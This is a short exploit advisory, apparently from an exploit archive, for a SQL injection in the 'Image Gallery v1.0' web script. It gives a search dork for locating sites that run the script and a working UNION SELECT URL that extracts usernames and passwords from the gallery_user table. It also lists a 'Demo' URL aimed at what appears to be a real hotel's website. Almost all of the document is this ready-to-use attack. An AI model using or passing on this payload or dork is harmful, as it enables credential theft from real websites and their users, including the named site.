Image Gallery version 1.0 suffers from a remote SQL injection vulnerability.
d42bdf5d0ac5eb33f7e85e93ed95741f18622275c57c12df94cb7552e6ecfb4a
Image Gallery v1.0 (pid) Remote SQL Injection Vulnerability
___________________________________
Author : Hussin X
Home : IQ-SecuriTY > www.IQ-TY.com
Mail : darkangel_G85@yahoo.com
___________________________________
script : http://www.elkagroup.com
DorK : "Powered by : elkagroup.com"
exploit :
_______
http://www.site.com/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--
Demo :
_______
http://www.abbasihotel.com/gallery/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--
Coding password : mysql